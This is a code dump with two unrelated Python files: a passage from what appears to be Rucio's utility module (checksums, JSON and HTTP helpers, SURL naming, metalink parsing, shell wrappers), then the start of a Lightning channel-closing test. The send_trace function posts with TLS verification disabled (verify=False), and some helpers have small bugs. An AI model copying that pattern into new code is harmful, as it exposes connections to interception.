EXTRA_MODULES[extra_module] = True
except ImportError:
EXTRA_MODULES[extra_module] = False
if EXTRA_MODULES['web']:
from web import HTTPError
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
if EXTRA_MODULES['flask']:
from flask import Response
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def oidc_identity_string(sub, iss):
"""
Transform IdP sub claim and issuers url into users identity string.
:param sub: users SUB claim from the Identity Provider
:param iss: issuer (IdP) https url
:returns: OIDC identity string "SUB=<usersid>, ISS=https://iam-test.ch/"
"""
return 'SUB=' + str(sub) + ', ISS=' + str(iss)
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, basestring) and isinstance(audience, basestring) and # NOQA: W504
isinstance(required_scope, basestring) and isinstance(required_audience, basestring)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and # NOQA: W504
isinstance(required_scope, basestring) and isinstance(required_audience, basestring)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, basestring) and isinstance(audience, basestring) and # NOQA: W504
isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
def clean_headers(msg):
invalid_characters = ['\n', '\r']
for c in invalid_characters:
msg = str(msg).replace(c, ' ')
return msg
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
try:
with open(file, 'rb') as openFile:
for line in openFile:
adler = zlib.adler32(line, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler32 checksum of file %s - %s' % (file, e))
# backflip on 32bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return u" ".join(vallist)
else:
return unicode(vallist)
except:
return u''
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, EnumSymbol):
return obj.description
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(l):
""" JSON render function for list
"""
return json.dumps(l, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
ret_obj = None
try:
ret_obj = data.decode('utf-8')
except AttributeError:
ret_obj = data
return json.loads(ret_obj, object_hook=datetime_parser)
def generate_http_error(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
status = codes[status_code]
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
headers = {'Content-Type': 'application/octet-stream',
'ExceptionClass': exc_cls,
'ExceptionMessage': clean_headers(exc_msg)}
try:
return HTTPError(status, headers=headers, data=render_json(**data))
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def generate_http_error_flask(status_code, exc_cls, exc_msg):
"""
utitily function to generate a complete HTTP error response.
:param status_code: The HTTP status code to generate a response for.
:param exc_cls: The name of the exception class to send with the response.
:param exc_msg: The error message.
:returns: a web.py HTTP response object.
"""
data = {'ExceptionClass': exc_cls,
'ExceptionMessage': exc_msg}
# Truncate too long exc_msg
if len(str(exc_msg)) > 15000:
exc_msg = str(exc_msg)[:15000]
resp = Response(response=render_json(**data), status=status_code, content_type='application/octet-stream')
resp.headers['ExceptionClass'] = exc_cls
resp.headers['ExceptionMessage'] = clean_headers(exc_msg)
try:
return resp
except Exception:
print({'Content-Type': 'application/octet-stream', 'ExceptionClass': exc_cls, 'ExceptionMessage': str(exc_msg).strip()})
raise
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out = ''
err = ''
exitcode = 0
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out, err
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in range(0, len(l), n):
yield l[i:i + n]
def my_key_generator(namespace, fn, **kw):
"""
Customyzed key generator for dogpile
"""
fname = fn.__name__
def generate_key(*arg, **kw):
return namespace + "_" + fname + "_".join(str(s) for s in filter(None, arg))
return generate_key
def get_logger(name):
logger = getLogger(name)
hdlr = RotatingFileHandler('%s/%s.log' % (config_get('common', 'logdir'), name), maxBytes=1000000000, backupCount=10)
formatter = Formatter('%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(config_get('common', 'loglevel').upper())
return logger
def construct_surl_DQ2(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains DQ2 convention. To be used for non-deterministic sites.
Method imported from DQ2.
@return: relative SURL for new replica.
@rtype: str
"""
# check how many dots in dsn
fields = dsn.split('.')
nfields = len(fields)
if nfields == 0:
return '/other/other/%s' % (filename)
elif nfields == 1:
stripped_dsn = __strip_dsn(dsn)
return '/other/%s/%s' % (stripped_dsn, filename)
elif nfields == 2:
project = fields[0]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s' % (project, stripped_dsn, filename)
elif nfields < 5 or re.match('user*|group*', fields[0]):
project = fields[0]
f2 = fields[1]
f3 = fields[2]
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, f2, f3, stripped_dsn, filename)
else:
project = fields[0]
dataset_type = fields[4]
if nfields == 5:
tag = 'other'
else:
tag = __strip_tag(fields[-1])
stripped_dsn = __strip_dsn(dsn)
return '/%s/%s/%s/%s/%s' % (project, dataset_type, tag, stripped_dsn, filename)
def construct_surl_T0(dsn, filename):
"""
Defines relative SURL for new replicas. This method
contains Tier0 convention. To be used for non-deterministic sites.
@return: relative SURL for new replica.
@rtype: str
"""
fields = dsn.split('.')
nfields = len(fields)
if nfields >= 3:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], fields[1], dsn, filename)
elif nfields == 1:
return '/%s/%s/%s/%s/%s' % (fields[0], 'other', 'other', dsn, filename)
elif nfields == 2:
return '/%s/%s/%s/%s/%s' % (fields[0], fields[2], 'other', dsn, filename)
elif nfields == 0:
return '/other/other/other/other/%s' % (filename)
def construct_surl_BelleII(dsn, filename):
"""
Defines relative SURL for Belle II specific replicas.
This method contains the Belle II convention.
To be used for non-deterministic Belle II sites.
DSN (or datablock in the Belle II naming) contains /
"""
fields = dsn.split("/")
nfields = len(fields)
if nfields == 0:
return '/other/%s' % (filename)
else:
return '%s/%s' % (dsn, filename)
_SURL_ALGORITHMS = {}
_DEFAULT_SURL = 'DQ2'
def register_surl_algorithm(surl_callable, name=None):
if name is None:
name = surl_callable.__name__
_SURL_ALGORITHMS[name] = surl_callable
register_surl_algorithm(construct_surl_T0, 'T0')
register_surl_algorithm(construct_surl_DQ2, 'DQ2')
register_surl_algorithm(construct_surl_BelleII, 'BelleII')
def construct_surl(dsn, filename, naming_convention=None):
# ensure that policy package is loaded in case it registers its own algorithms
import rucio.common.schema # noqa: F401
if naming_convention is None or naming_convention not in _SURL_ALGORITHMS:
naming_convention = _DEFAULT_SURL
return _SURL_ALGORITHMS[naming_convention](dsn, filename)
def __strip_dsn(dsn):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in.
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_frag']
fields = dsn.split('.')
last_field = fields[-1]
try:
for suffix in suffixes_to_drop:
last_field = re.sub('%s.*$' % suffix, '', last_field)
except IndexError:
return dsn
fields[-1] = last_field
stripped_dsn = '.'.join(fields)
return stripped_dsn
def __strip_tag(tag):
"""
Drop the _sub and _dis suffixes for panda datasets from the lfc path
they will be registered in
Method imported from DQ2.
"""
suffixes_to_drop = ['_dis', '_sub', '_tid']
stripped_tag = tag
try:
for suffix in suffixes_to_drop:
stripped_tag = re.sub('%s.*$' % suffix, '', stripped_tag)
except IndexError:
return stripped_tag
return stripped_tag
def clean_surls(surls):
res = []
for surl in surls:
if surl.startswith('srm'):
surl = re.sub(':[0-9]+/', '/', surl)
surl = re.sub('/srm/managerv1\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/v2/server\?SFN=', '', surl) # NOQA: W605
surl = re.sub('/srm/managerv2\?SFN=', '', surl) # NOQA: W605
res.append(surl)
res.sort()
return res
def pid_exists(pid):
"""
Check whether pid exists in the current process table.
UNIX only.
"""
if pid < 0:
return False
if pid == 0:
# According to "man 2 kill" PID 0 refers to every process
# in the process group of the calling process.
# On certain systems 0 is a valid PID but we have no way
# to know that in a portable fashion.
raise ValueError('invalid PID 0')
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def sizefmt(num, human=True):
"""
Print human readable file sizes
"""
if num is None:
return '0.0 B'
try:
num = int(num)
if human:
for unit in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1000.0:
return "%3.3f %sB" % (num, unit)
num /= 1000.0
return "%.1f %sB" % (num, 'Y')
else:
return str(num)
except OverflowError:
return 'Inf'
def get_tmp_dir():
"""
Get a path where to store temporary files.
Rucio searches a standard list of temporary directories. The list is:
The directory named by the TMP environment variable.
The directory named by the TMPDIR environment variable.
The directory named by the TEMP environment variable.
As a last resort, the /tmp/ directory.
:return: A path.
"""
base_dir = os.path.abspath(tempfile.gettempdir())
try:
return os.path.join(base_dir, getpass.getuser())
except Exception:
pass
try:
return os.path.join(base_dir, str(os.getuid()))
except Exception:
pass
return base_dir
def is_archive(name):
'''
Check if a file name is an archive file or not.
:return: A boolean.
'''
regexp = r'^.*\.(zip|zipx|tar.gz|tgz|tar.Z|tar.bz2|tbz2)(\.\d+)*$'
if re.match(regexp, name, re.I):
return True
return False
class Color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
def detect_client_location():
"""
Open a UDP socket to a machine on the internet, to get the local IPv4 and IPv6
addresses of the requesting client.
Try to determine the sitename automatically from common environment variables,
in this order: SITE_NAME, ATLAS_SITE_NAME, OSG_SITE_NAME. If none of these exist
use the fixed string 'ROAMING'.
"""
ip = '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
except Exception:
pass
ip6 = '::'
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("2001:4860:4860:0:0:0:0:8888", 80))
ip6 = s.getsockname()[0]
except Exception:
pass
site = os.environ.get('SITE_NAME',
os.environ.get('ATLAS_SITE_NAME',
os.environ.get('OSG_SITE_NAME',
'ROAMING')))
return {'ip': ip,
'ip6': ip6,
'fqdn': socket.getfqdn(),
'site': site}
def ssh_sign(private_key, message):
"""
Sign a string message using the private key.
:param private_key: The SSH RSA private key as a string.
:param message: The message to sign as a string.
:return: Base64 encoded signature as a string.
"""
if PY3 and isinstance(message, str):
message = message.encode()
if not EXTRA_MODULES['paramiko']:
raise MissingModuleException('The paramiko module is not installed or faulty.')
sio_private_key = StringIO(private_key)
priv_k = RSAKey.from_private_key(sio_private_key)
sio_private_key.close()
signature_stream = priv_k.sign_ssh_data(message)
signature_stream.rewind()
base64_encoded = base64.b64encode(signature_stream.get_remainder())
if PY3:
base64_encoded = base64_encoded.decode()
return base64_encoded
def make_valid_did(lfn_dict):
"""
When managing information about a LFN (such as in `rucio upload` or
the RSE manager's upload), we add the `filename` attribute to record
the name of the file on the local disk in addition to the remainder
of the DID information.
This function will take that python dictionary, and strip out the
additional `filename` key. If this is not done, then the dictionary
will not pass the DID JSON schema validation.
"""
lfn_copy = dict(lfn_dict)
lfn_copy['name'] = lfn_copy.get('name', lfn_copy['filename'])
del lfn_copy['filename']
return lfn_copy
def send_trace(trace, trace_endpoint, user_agent, retries=5):
"""
Send the given trace to the trace endpoint
:param trace: the trace dictionary to send
:param trace_endpoint: the endpoint where the trace should be send
:param user_agent: the user agent sending the trace
:param retries: the number of retries if sending fails
:return: 0 on success, 1 on failure
"""
if user_agent.startswith('pilot'):
return 0
for dummy in range(retries):
try:
requests.post(trace_endpoint + '/traces/', verify=False, data=json.dumps(trace))
return 0
except Exception:
pass
return 1
def add_url_query(url, query):
"""
Add a new dictionary to URL parameters
:param url: The existing URL
:param query: A dictionary containing key/value pairs to be added to the URL
:return: The expanded URL with the new query parameters
"""
url_parts = list(urlparse.urlparse(url))
mod_query = dict(urlparse.parse_qsl(url_parts[4]))
mod_query.update(query)
url_parts[4] = urlencode(mod_query)
return urlparse.urlunparse(url_parts)
def get_bytes_value_from_string(input_string):
"""
Get bytes from a string that represents a storage value and unit
:param input_string: String containing a value and an unit
:return: Integer value representing the value in bytes
"""
result = re.findall('^([0-9]+)([A-Za-z]+)$', input_string)
if result:
value = int(result[0][0])
unit = result[0][1].lower()
if unit == 'b':
value = value
elif unit == 'kb':
value = value * 1000
elif unit == 'mb':
value = value * 1000000
elif unit == 'gb':
value = value * 1000000000
elif unit == 'tb':
value = value * 1000000000000
elif unit == 'pb':
value = value * 1000000000000000
else:
return False
return value
else:
return False
def parse_did_filter_from_string(input_string):
"""
Parse DID filter options in format 'length<3,type=all' from string.
:param input_string: String containing the filter options.
:return: filter dictionary and type as string.
"""
filters = {}
type = 'collection'
if input_string:
filter_options = input_string.replace(' ', '').split(',')
for option in filter_options:
value = None
key = None
if '>=' in option:
key, value = option.split('>=')
if key == 'length':
key = 'length.gte'
elif '>' in option:
key, value = option.split('>')
if key == 'length':
key = 'length.gt'
elif '<=' in option:
key, value = option.split('<=')
if key == 'length':
key = 'length.lte'
elif '<' in option:
key, value = option.split('<')
if key == 'length':
key = 'length.lt'
elif '=' in option:
key, value = option.split('=')
if key == 'created_after' or key == 'created_before':
value = datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S.%fZ')
if key == 'type':
if value.upper() in ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']:
type = value.lower()
else:
raise InvalidType('{0} is not a valid type. Valid types are {1}'.format(value, ['ALL', 'COLLECTION', 'CONTAINER', 'DATASET', 'FILE']))
elif key in ('length.gt', 'length.lt', 'length.gte', 'length.lte', 'length'):
try:
value = int(value)
filters[key] = value
except ValueError:
raise ValueError('Length has to be an integer value.')
filters[key] = value
elif isinstance(value, string_types):
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
else:
filters[key] = value
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
if 'rse_id' in dictionary.keys():
if 'rse' not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary['rse'] = rucio.core.rse.get_rse_name(rse_id=dictionary['rse_id'])
if 'account' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def query_bunches(query, bunch_by):
"""
Queries output by yield_per sqlalchemy function
(which in a for loop returns rows one by one).
Groups the query rows in bunches of bunch_by
elements and returns list of bunches.
:param query: sqlalchemy session query
:param bunch_by: integer number
:returns: [[bunch_of_tuples_1],[bunch_of_tuples_2],...]
"""
filtered_bunches = []
item_bunch = []
for i in query.yield_per(bunch_by):
# i is either tuple of one element (token/model object etc.)
if not isinstance(i, tuple) and not isinstance(i, list):
item_bunch.append(i)
# or i is a tuple with the column elements per row
else:
item_bunch += i
if len(item_bunch) % bunch_by == 0:
filtered_bunches.append(item_bunch)
item_bunch = []
if item_bunch:
filtered_bunches.append(item_bunch)
return filtered_bunches
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError
from utils import (
only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND,
SLOW_MACHINE, COMPAT
)
import os
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = 5430 if not chainparams['elements'] else 8955
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-fast-gossip
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
